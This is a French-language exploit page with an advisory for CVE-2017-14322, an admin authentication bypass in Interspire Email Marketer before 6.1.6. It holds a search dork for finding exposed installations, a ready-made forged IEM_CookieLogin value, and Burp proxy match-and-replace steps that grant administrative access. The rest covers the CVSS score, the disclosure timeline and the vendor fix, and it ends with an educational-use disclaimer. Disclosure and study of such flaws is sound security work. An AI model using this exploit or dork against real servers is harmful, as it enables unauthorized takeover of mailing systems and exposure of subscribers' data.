
CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit
intitle:"Control Panel" + emailmarketer
Ajoutez une règle Match and Replace pour l'en-tête de requête comme ci-dessous :
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D
Lorsque vous ouvrez le site, cela ne fonctionnera pas la première fois car l'en-tête Cookie n'est pas présent. Rafraîchissez le site une deuxième fois en utilisant le proxy Burp avec la règle ajoutée ci-dessus, vous verrez ce que vous souhaitiez. Assurez-vous de cocher « Intercept Client Requests »
Interspire Email Marketer - Contournement d'authentification admin à distance
Hakan Küsne, Infoteam Security (CH)
CVE-2017-14322
Score de base CVSS : 9.8 Vecteur CVSS : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O
2017-09-12 Vulnérabilité découverte 2017-09-12 Découverte que le fournisseur l'avait déjà corrigée mais n'en a jamais informé les clients, laissant des centaines de vulnérables en environnement réel 2017-10-17 Divulgation publique
Interspire Email Marketer antérieur à la version 6.1.6
http://www.interspire.com/emailmarketer/
La fonction chargée de vérifier si l'utilisateur est déjà connecté dans init.php d'Interspire Email Marketer (IEM) antérieur à 6.1.6 permet à des attaquants distants de contourner l'authentification et d'obtenir un accès administratif en utilisant le cookie IEM_CookieLogin avec une valeur spécialement conçue. De plus, si le client n'a pas de plan de maintenance annuel, l'application indique qu'elle est sur la dernière version disponible et qu'il n'y a pas de mise à jour.
Les vulnérabilités ont été découvertes lors d'une réponse à incident sur une instance compromise de l'application.
Détails fournis ici : https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html
Le fournisseur a corrigé la vulnérabilité dans la version 6.1.6, mais n'en a jamais spécifiquement informé ses clients.
Cet exploit est uniquement à des fins éducatives et n'est pas responsable de vos propres actions.